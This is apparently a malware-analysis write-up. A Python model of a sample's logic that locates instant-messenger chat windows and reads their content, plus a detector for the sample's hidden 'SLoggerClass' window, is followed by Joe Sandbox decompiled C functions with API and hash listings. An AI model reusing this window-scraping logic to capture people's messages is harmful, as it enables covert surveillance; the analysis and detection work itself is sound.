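from dataclasses import dataclass, field


@dataclass
class Win:
    hwnd: int
    cls: str
    title: str = ""
    visible: bool = True
    children: list = field(default_factory=list)


class WindowTree:
    DESKTOP = 0  # FindWindowExA(NULL, ...) searches top-level windows

    def __init__(self, roots):
        self._kids = {self.DESKTOP: list(roots)}
        self._win = {}
        stack = list(roots)
        while stack:
            w = stack.pop()
            self._win[w.hwnd] = w
            self._kids[w.hwnd] = list(w.children)
            stack.extend(w.children)

    def find_window_ex(self, parent, after, cls):
        """FindWindowExA: first direct child of `parent` positioned after
        `after` (0 = from the start) whose class is `cls`; 0 when none."""
        kids = self._kids.get(parent, [])
        start = 0
        if after:
            idx = next((i for i, w in enumerate(kids) if w.hwnd == after), None)
            if idx is None:          # `after` is not a child of `parent`
                return 0
            start = idx + 1
        for w in kids[start:]:
            if w.cls == cls:
                return w.hwnd
        return 0

    def is_window(self, hwnd):
        return hwnd in self._win

    def is_window_visible(self, hwnd):
        return self.is_window(hwnd) and self._win[hwnd].visible

    def window_text(self, hwnd):
        return self._win[hwnd].title if self.is_window(hwnd) else ""


def find_nested(tree, parent, outer_cls, inner_cls):
    """E0040FF68: FindWindowExA(parent, 0, outer) then FindWindowExA(that, 0, inner)."""
    outer = tree.find_window_ex(parent, 0, outer_cls)
    return tree.find_window_ex(outer, 0, inner_cls) if outer else 0


def is_im_window(tree, hwnd, cls):
    """E0040ADDB: IsWindow, then the two strncmp'd class-name prefixes."""
    if not tree.is_window(hwnd):
        return False
    if cls.startswith("IMClass"):                  # strncmp(cls, "IMClass", 7)
        return find_nested(tree, hwnd, "YHTMLContainer", "Internet Explorer_Server") != 0
    if cls.startswith("YSearchMenuWndClass"):      # strncmp(cls, ..., 0x13)
        return "Instant Message" in tree.window_text(hwnd)   # CString::Find != -1
    return False


def visible_ie_servers(tree, parent=WindowTree.DESKTOP):
    """E0040B4C1: each __oxFrame.class__ sibling whose Internet Explorer_Server
    child is visible (the sample then reads and keeps the longest content)."""
    hits, frame = [], 0
    while True:
        frame = tree.find_window_ex(parent, frame, "__oxFrame.class__")
        if not frame:
            return hits
        ie = tree.find_window_ex(frame, 0, "Internet Explorer_Server")
        if ie and tree.is_window_visible(ie):
            hits.append(ie)


def logger_windows(tree):
    """Defender side: top-level windows of the class E0040EF63 registers.
    Assumes the window is created top-level (parent comes from the caller)."""
    hits, h = [], 0
    while True:
        h = tree.find_window_ex(WindowTree.DESKTOP, h, "SLoggerClass")
        if not h:
            return hits
        hits.append(h)


# Constructed test data: two IM windows, one search window that does not
# match, two Messenger frames (one hidden), and the sample's own hidden window.
SAMPLE_TREE = WindowTree([
    Win(0x10, "IMClass", "alice - Instant Message", children=[
        Win(0x11, "YHTMLContainer", children=[Win(0x12, "Internet Explorer_Server")])]),
    Win(0x20, "YSearchMenuWndClass", "Instant Message"),
    Win(0x30, "YSearchMenuWndClass", "Search"),
    Win(0x40, "__oxFrame.class__", children=[Win(0x41, "Internet Explorer_Server", visible=False)]),
    Win(0x50, "__oxFrame.class__", children=[Win(0x51, "Internet Explorer_Server")]),
    Win(0x60, "SLoggerClass", "SLoggerWindow", visible=False),
])

if __name__ == "__main__":
    print("IM windows:", [h for h in (0x10, 0x20, 0x30)
                          if is_im_window(SAMPLE_TREE, h, SAMPLE_TREE.window_text(h) and SAMPLE_TREE._win[h].cls)])
    print("visible IE servers:", visible_ie_servers(SAMPLE_TREE))
    print("SLogger windows:", logger_windows(SAMPLE_TREE))
```

The IsWindow check before the strncmp calls, and the sibling walk that resumes from the previous frame handle rather than restarting from 0, are what keep the sample's loop from spinning on a stale handle or returning the same frame twice; the same two points apply when backing `WindowTree` with real user32 calls, where a class-name match on "SLoggerClass" on a host that should not be running this sample is the indicator to act on.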

    C-Code - Quality: 55%
    			E004257A8(void* __eflags) {
    				char _t44;
    				intOrPtr* _t50;
    				intOrPtr* _t53;
    				intOrPtr* _t58;
    				signed int _t71;
    				void* _t90;
    				void* _t92;
    				void* _t94;
    
    				E0043E4E0(0x4429f4, _t92); // @0x004257ad
    				L0043DDD8(); // @0x004257be
    				_push(_t92 - 0x34); // @0x004257cb
    				 *(_t92 - 4) = 0; // @0x004257cc
    				L0043E4A4(); // @0x004257cf
    				_t44 =  *0x4550cc; // 0x0 @0x004257d4
    				 *((char*)(_t92 - 0xb4)) = _t44; // @0x004257db
    				_t71 = 0x1f; // @0x004257e1
    				memset(_t92 - 0xb3, 0, _t71 << 2); // @0x004257ea
    				asm("stosw"); // @0x004257ec
    				asm("stosb"); // @0x004257ee
    				E0042A943(_t92 - 0xb4); // @0x004257f6
    				 *((intOrPtr*)(_t94 - 0xa8 + 0xc)) = 0xe03b; // @0x004257fe
    				_push(_t92 - 0x18); // @0x00425805
    				_t50 = E00429029(); // @0x00425806
    				 *(_t92 - 4) = 1; // @0x00425810
    				_t53 = E004290DB(0, _t92 - 0x14, _t92 - 0x34); // @0x00425819
    				 *(_t92 - 4) = 2; // @0x00425823
    				 *((intOrPtr*)(_t92 + 0xc)) = E00429098(0, _t92 - 0x20, _t92 - 0x34); // @0x00425831
    				 *(_t92 - 4) = 3; // @0x0042583d
    				_t58 = E00429029(_t92 - 0x1c, 0xe054); // @0x00425841
    				_push( *_t50); // @0x00425849
    				 *(_t92 - 4) = 4; // @0x00425853
    				_push( *((intOrPtr*)(_t92 + 0x14))); // @0x00425857
    				_push(_t92 - 0xb4); // @0x0042585a
    				_push( *((intOrPtr*)(_t92 + 0x10))); // @0x0042585e
    				_push( *_t53); // @0x00425861
    				_push( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0xc))))); // @0x00425863
    				_push( *_t58); // @0x00425865
    				_push(_t92 - 0x10); // @0x00425869
    				L0043E174(); // @0x0042586a
    				 *(_t92 - 4) = 3; // @0x00425875
    				L0043DD36(); // @0x00425879
    				 *(_t92 - 4) = 2; // @0x00425881
    				L0043DD36(); // @0x00425885
    				 *(_t92 - 4) = 1; // @0x0042588d
    				L0043DD36(); // @0x00425891
    				 *(_t92 - 4) = 0; // @0x00425899
    				L0043DD36(); // @0x0042589c
    				_t90 = CreateFileA( *(_t92 + 8), 0x40000000, 0, 0, 2, 0x80, 0); // @0x004258b9
    				if(_t90 != 0xffffffff) { // @0x004258be
    					if(WriteFile(_t90,  *(_t92 - 0x10),  *( *(_t92 - 0x10) - 8), _t92 - 0x24, 0) != 0) { // @0x004258d6
    						_push(1); // @0x004258d8
    						_pop(0); // @0x004258da
    					} // @0x004258da
    					CloseHandle(_t90); // @0x004258dc
    				} // @0x004258dc
    				 *(_t92 - 4) =  *(_t92 - 4) | 0xffffffff; // @0x004258e2
    				L0043DD36(); // @0x004258e9
    				 *[fs:0x0] =  *((intOrPtr*)(_t92 - 0xc)); // @0x004258f6
    				return 0; // @0x004258fe
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 004257AD
    • #540.MFC42 ref: 004257BE
    • #6673.MFC42(?), ref: 004257CF
      • Part of subcall function 0042A943: WSAStartup.WSOCK32(00000101,?), ref: 0042A95B
      • Part of subcall function 0042A943: gethostname.WSOCK32(?,00000064,00000101,?), ref: 0042A96C
      • Part of subcall function 0042A943: lstrcmpA.KERNEL32(?,004550CC,?,00000064,00000101,?), ref: 0042A982
      • Part of subcall function 0042A943: gethostbyname.WSOCK32(?), ref: 0042A994
      • Part of subcall function 0042A943: htonl.WSOCK32(?,?), ref: 0042A9DB
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042A9F0
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,?), ref: 0042A9FC
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA0E
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA17
      • Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA20
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA35
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA3E
      • Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA47
      • Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA57
      • Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA60
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
      • Part of subcall function 004290DB: GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
      • Part of subcall function 004290DB: #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107
      • Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
      • Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
      • Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0
    • #2818.MFC42(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0042586A
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00425879
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00425885
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00425891
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042589C
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004258B3
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004258CE
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004258DC
    • #800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004258E9
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$_itoalstrcat$#537$FileFormatstrcat$#1168#2818#540#6673BuffCharCloseCreateDateH_prologHandleLoadStartupStringTimeUpperWritegethostbynamegethostnamehtonllstrcmp
    • String ID:
    • API String ID: 545889104-0
    • Opcode ID: 8d8e9aeebc3f8646fd0442d61515dd55999b0b0dfe504a9ed2343bb8155cbd0b
    • Instruction ID: ea83334349e1345f7e2b39c5aa52f92b30f19cd4b918af62beb1ff4c60b0ced4
    • Opcode Fuzzy Hash: 8d8e9aeebc3f8646fd0442d61515dd55999b0b0dfe504a9ed2343bb8155cbd0b
    • Instruction Fuzzy Hash: 3B41ED71D0125CEEDB11EBA4DD85BEEBBB8AF19308F10456AF511A3291DB385F08CB25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 41%
    			E0040C33B(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr _t53;
    				int _t55;
    				void* _t56;
    				int _t58;
    				void* _t66;
    				void* _t68;
    				void* _t69;
    				void* _t70;
    				void* _t72;
    				struct HWND__* _t80;
    				int _t89;
    				intOrPtr* _t93;
    				void* _t95;
    
    				E0043E4E0(0x43fd6c, _t95); // @0x0040c340
    				_t93 = __ecx; // @0x0040c34d
    				_t89 = 1; // @0x0040c34f
    				_push(__ecx); // @0x0040c350
    				 *(_t95 - 0x10) = _t89; // @0x0040c354
    				E0040C4A1(_t95 - 0x44); // @0x0040c357
    				_t53 =  *((intOrPtr*)(__ecx + 8)); // @0x0040c361
    				 *(_t95 - 4) = 0; // @0x0040c363
    				 *((intOrPtr*)(__ecx + 0x28)) = 0; // @0x0040c366
    				if(_t53 == 0) { // @0x0040c369
    					L23: // @0x0040c47e
    					 *(_t93 + 0x24) =  *(_t93 + 0x24) | 0xffffffff; // @0x0040c47e
    					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff; // @0x0040c482
    					L00403FBC(_t95 - 0x44); // @0x0040c489
    					_t55 = _t89; // @0x0040c48e
    					L24: // @0x0040c490
    					 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc)); // @0x0040c496
    					return _t55; // @0x0040c49e
    				} // @0x0040c49e
    				_t56 = _t53 - 1; // @0x0040c36f
    				if(_t56 == 0) { // @0x0040c370
    					_t80 =  *(__ecx + 0x20); // @0x0040c438
    					_push(__ecx); // @0x0040c440
    					_push(0); // @0x0040c441
    					_push( *((intOrPtr*)(__ecx + 0x1c))); // @0x0040c442
    					if(_t80 != 0xffff) { // @0x0040c447
    						_t58 = SendMessageA(_t80, ??, ??, ??); // @0x0040c453
    					} else { // @0x0040c449
    						_t58 = PostMessageA(0xffff, ??, ??, ??); // @0x0040c44a
    					} // @0x0040c44a
    					 *(_t95 - 0x10) = _t58; // @0x0040c45b
    					if(_t58 != 0) { // @0x0040c45e
    						goto L23;
    					} else { // @0x0040c460
    						 *(_t93 + 0x24) = 0xfffffffd; // @0x0040c460
    						L10: // @0x0040c3f4
    						 *(_t95 - 0x20) =  *(_t93 + 0x24); // @0x0040c3f9
    						 *(_t95 - 0x1c) =  *(_t93 + 0x28); // @0x0040c3ff
    						E0040C2DE(_t93, _t95 - 0x44); // @0x0040c406
    						if( *(_t95 - 0x10) != 0) { // @0x0040c40e
    							 *(_t93 + 0x24) =  *(_t93 + 0x24) | 0xffffffff; // @0x0040c469
    						} else { // @0x0040c410
    							if( *((intOrPtr*)(_t95 + 8)) != 0) { // @0x0040c413
    								 *((intOrPtr*)( *_t93))(); // @0x0040c419
    							} // @0x0040c419
    						} // @0x0040c413
    						 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff; // @0x0040c46d
    						L00403FBC(_t95 - 0x44); // @0x0040c474
    						_t55 =  *(_t95 - 0x10); // @0x0040c479
    						goto L24;
    					} // @0x0040c479
    				} // @0x0040c45e
    				_t66 = _t56 - 1; // @0x0040c376
    				if(_t66 == 0) { // @0x0040c377
    					 *(_t95 - 0x14) = "open"; // @0x0040c42f
    					L8: // @0x0040c3ca
    					_t18 = _t95 - 0x14; // 0x453854 @0x0040c3d9
    					_t68 = ShellExecuteA(0,  *_t18,  *(_t93 + 0xc),  *(_t93 + 0x10),  *(_t93 + 0x14),  *(_t93 + 0x18)); // @0x0040c3dd
    					 *(_t93 + 0x28) = _t68; // @0x0040c3e6
    					if(_t68 <= 0x20) { // @0x0040c3e9
    						 *(_t95 - 0x10) = 0; // @0x0040c3eb
    						 *(_t93 + 0x24) = _t68; // @0x0040c3ee
    						 *(_t93 + 0x28) = 0; // @0x0040c3f1
    					} // @0x0040c3f1
    					goto L10;
    				} // @0x0040c3e9
    				_t69 = _t66 - 1; // @0x0040c37d
    				if(_t69 == 0) { // @0x0040c37e
    					 *(_t95 - 0x14) = "print"; // @0x0040c426
    					goto L8;
    				} // @0x0040c426
    				_t70 = _t69 - 1; // @0x0040c384
    				if(_t70 == 0) { // @0x0040c385
    					 *(_t95 - 0x14) = "explore"; // @0x0040c41d
    					goto L8;
    				} // @0x0040c41d
    				if(_t70 == 1) { // @0x0040c38c
    					_t72 = _t95 - 0x18; // @0x0040c39d
    					_push(__ecx + 0xc); // @0x0040c3a0
    					_push("mailto:"); // @0x0040c3a1
    					_push(_t72); // @0x0040c3a6
    					 *(_t95 - 0x14) = "open"; // @0x0040c3a7
    					L0043E168(); // @0x0040c3ae
    					_push(_t72); // @0x0040c3b3
    					 *(_t95 - 4) = 1; // @0x0040c3b6
    					L0043DFCA(); // @0x0040c3ba
    					 *(_t95 - 4) = 0; // @0x0040c3c2
    					L0043DD36(); // @0x0040c3c5
    					goto L8;
    				} else { // @0x0040c38e
    					 *(_t95 - 0x10) = 0; // @0x0040c38e
    					 *((intOrPtr*)(__ecx + 0x24)) = 0xfffffffe; // @0x0040c391
    					goto L10;
    				} // @0x0040c391
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040C340
      • Part of subcall function 0040C4A1: __EH_prolog.LIBCMT ref: 0040C4A6
      • Part of subcall function 0040C4A1: #535.MFC42(?,00000001,?,?,0040C35C), ref: 0040C4C9
      • Part of subcall function 0040C4A1: #535.MFC42(?,?,00000001,?,?,0040C35C), ref: 0040C4D9
      • Part of subcall function 0040C4A1: #535.MFC42(?,?,?,00000001,?,?,0040C35C), ref: 0040C4E9
    • #926.MFC42(?,mailto:,?), ref: 0040C3AE
    • #858.MFC42(00000000,?,mailto:,?), ref: 0040C3BA
    • #800.MFC42(00000000,?,mailto:,?), ref: 0040C3C5
    • ShellExecuteA.SHELL32(00000000,T8E,?,?,open,?), ref: 0040C3DD
    • PostMessageA.USER32 ref: 0040C44A
    • SendMessageA.USER32(?,?,00000000), ref: 0040C453
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #535$H_prologMessage$#800#858#926ExecutePostSendShell
    • String ID: T8E$mailto:$open
    • API String ID: 3398598249-3025285594
    • Opcode ID: 6247d9da6b809c4ee07c7427865a15069e766f05ccdd5fe3d45040bb234485e5
    • Instruction ID: 508d97c8793d561e66a460f693c62342e6e855f8a90b7849c99228def6b57334
    • Opcode Fuzzy Hash: 6247d9da6b809c4ee07c7427865a15069e766f05ccdd5fe3d45040bb234485e5
    • Instruction Fuzzy Hash: 38416CB0900605DBCB20DFA5C9948BFBBF4FB48354B104B2EE456A26D0D738AA05DB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00422006(void* __ecx) {
    				struct HWND__* _t34;
    				signed char _t37;
    				struct HWND__* _t39;
    				signed char _t53;
    				signed char _t62;
    				void* _t64;
    				void* _t66;
    
    				E0043E4E0(0x442354, _t66); // @0x0042200b
    				_t64 = __ecx; // @0x00422018
    				 *((char*)(_t66 - 0xd)) = 1; // @0x0042201e
    				if(__ecx != 0) { // @0x00422022
    					_t34 =  *(__ecx + 0x20); // @0x00422028
    				} else { // @0x00422024
    					_t34 = 0; // @0x00422024
    				} // @0x00422024
    				UnregisterHotKey(_t34, 0); // @0x0042202d
    				_t53 =  *(_t64 + 0x17cc); // @0x00422033
    				_t37 =  *((intOrPtr*)(_t64 + 0x17cd)); // @0x0042203b
    				_t62 = 0; // @0x00422041
    				if((_t53 & 0xffff7fff) != 0) { // @0x00422049
    					if((_t37 & 0x00000001) != 0) { // @0x00422051
    						_t62 = 4; // @0x00422053
    					} // @0x00422053
    					if((_t37 & 0x00000002) != 0) { // @0x00422058
    						_t62 = _t62 | 0x00000002; // @0x0042205a
    					} // @0x0042205a
    					if((_t37 & 0x00000004) != 0) { // @0x0042205f
    						_t62 = _t62 | 0x00000001; // @0x00422061
    					} // @0x00422061
    					if((_t53 & 0x00000080) != 0) { // @0x00422067
    						_t62 = _t62 | 0x00000008; // @0x00422069
    					} // @0x00422069
    					if(_t64 != 0) { // @0x0042206e
    						_t39 =  *(_t64 + 0x20); // @0x00422074
    					} else { // @0x00422070
    						_t39 = 0; // @0x00422070
    					} // @0x00422070
    					if(RegisterHotKey(_t39, 0, _t62 & 0x000000ff,  *(_t64 + 0x17cc) & 0x000000ff) == 0) { // @0x0042208d
    						_t84 =  *((intOrPtr*)(_t66 + 8)); // @0x0042208f
    						if( *((intOrPtr*)(_t66 + 8)) != 0) { // @0x00422092
    							wsprintfA(_t66 - 0xdc,  *(E00429029(_t66 + 8, 0xe045)), 1); // @0x004220b0
    							L0043DD36(); // @0x004220bc
    							_push(0); // @0x004220c1
    							_push(0x30); // @0x004220c8
    							_push(_t66 - 0xdc); // @0x004220ca
    							L0043E16E(); // @0x004220cb
    						} // @0x004220cb
    						_push("pk.bin"); // @0x004220d0
    						_push(0x4558c8); // @0x004220d8
    						_push(_t66 - 0x14); // @0x004220dd
    						 *(_t64 + 0x17cc) = 0; // @0x004220de
    						L0043DE20(); // @0x004220e4
    						 *(_t66 - 4) = 0; // @0x004220f1
    						E0040BC5C(_t64 + 0x16b8, _t84,  *((intOrPtr*)(_t66 - 0x14))); // @0x004220f4
    						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff; // @0x004220f9
    						L0043DD36(); // @0x00422100
    						 *((char*)(_t66 - 0xd)) = 0; // @0x00422105
    					} // @0x00422105
    				} // @0x0042208d
    				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc)); // @0x00422110
    				return  *((intOrPtr*)(_t66 - 0xd)); // @0x00422118
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0042200B
    • UnregisterHotKey.USER32(?,00000000,?,00000000), ref: 0042202D
    • RegisterHotKey.USER32(?,00000000,?,?,?,00000000), ref: 00422085
    • wsprintfA.USER32 ref: 004220B0
    • #800.MFC42 ref: 004220BC
    • #1200.MFC42(?,00000030,00000000), ref: 004220CB
    • #924.MFC42(?,004558C8,pk.bin,?,00000000), ref: 004220E4
    • #800.MFC42(?,004558C8,pk.bin,?,00000000), ref: 00422100
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#1200#924H_prologRegisterUnregisterwsprintf
    • String ID: T#D$pk.bin
    • API String ID: 131833242-2389127637
    • Opcode ID: 7253a3284697f08c8775a1c482189036f6b92751c287326f864385b8c5144bd8
    • Instruction ID: a97f19a86c8e43e48310f7ab55b4d8e7a6396db94ecbe62869580f106e88529e
    • Opcode Fuzzy Hash: 7253a3284697f08c8775a1c482189036f6b92751c287326f864385b8c5144bd8
    • Instruction Fuzzy Hash: 27314B71900364AEDB349BB4E995BEB77A8EF09344F40052FF656A22D1D77C5A04C628
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428947(struct HWND__* _a4, CHAR* _a8) {
    				long _v8;
    				char _v268;
    				intOrPtr _v288;
    				intOrPtr _v296;
    				void _v300;
    				void* _v304;
    				void _v848;
    				char _v852;
    				int _t33;
    				intOrPtr _t37;
    				int _t39;
    				int _t40;
    				void* _t46;
    				signed int _t50;
    				void* _t61;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    
    				_t50 = 0x49; // @0x00428957
    				_v304 = 0; // @0x00428963
    				memset( &_v300, 0, _t50 << 2); // @0x00428969
    				_t63 = _t62 + 0xc; // @0x00428969
    				if(IsWindow(_a4) != 0) { // @0x00428973
    					GetWindowThreadProcessId(_a4,  &_v8); // @0x00428986
    					__eflags =  *0x455ba0; // 0x1 @0x0042898c
    					if(__eflags == 0) { // @0x00428992
    						_t61 = CreateToolhelp32Snapshot(2, 0); // @0x004289af
    						__eflags = _t61 - 0xffffffff; // @0x004289b1
    						if(_t61 == 0xffffffff) { // @0x004289b4
    							L14: // @0x00428a64
    							return 0;
    						} // @0x00428a64
    						_v304 = 0x128; // @0x004289c0
    						_t33 = Process32First(_t61,  &_v304); // @0x004289cc
    						__eflags = _t33; // @0x004289d2
    						if(_t33 == 0) { // @0x004289d4
    							L13: // @0x00428a5d
    							CloseHandle(_t61); // @0x00428a5e
    							goto L14;
    						} // @0x00428a5e
    						__eflags = 0; // @0x004289df
    						_v852 = 0; // @0x004289e7
    						memset( &_v848, 0, 0x88 << 2); // @0x004289ed
    						_t64 = _t63 + 0xc; // @0x004289ed
    						while(1) { // @0x004289ef
    							_t37 = _v296; // @0x004289ef
    							__eflags = _v8 - _t37; // @0x004289f5
    							if(_v8 != _t37) { // @0x004289f8
    								goto L10;
    							}
    							_t40 = E004288B3(_t37, _v288,  &_v852, 0x224); // @0x00428a0d
    							_t64 = _t64 + 0x10; // @0x00428a12
    							__eflags = _t40; // @0x00428a15
    							if(_t40 == 0) { // @0x00428a17
    								goto L10;
    							}
    							__eflags = _v8 - _v296; // @0x00428a1c
    							if(_v8 == _v296) { // @0x00428a22
    								lstrcpyA(_a8,  &_v268); // @0x00428a42
    								CharLowerA(_a8); // @0x00428a4b
    								CloseHandle(_t61); // @0x00428a52
    								_t46 = 1; // @0x00428a5a
    								return _t46;
    							} // @0x00428a5a
    							L10: // @0x00428a24
    							_t39 = Process32Next(_t61,  &_v304); // @0x00428a2c
    							__eflags = _t39; // @0x00428a32
    							if(_t39 == 0) { // @0x00428a34
    								goto L13;
    							}
    						} // @0x00428a36
    					} // @0x004289ef
    					return E00428B5B(0, _v8, _a8);
    				} // @0x004289a0
    				 *_a8 = 0; // @0x00428978
    				goto L14;
    			}

    APIs
    • IsWindow.USER32(00000000), ref: 0042896B
    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00428986
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
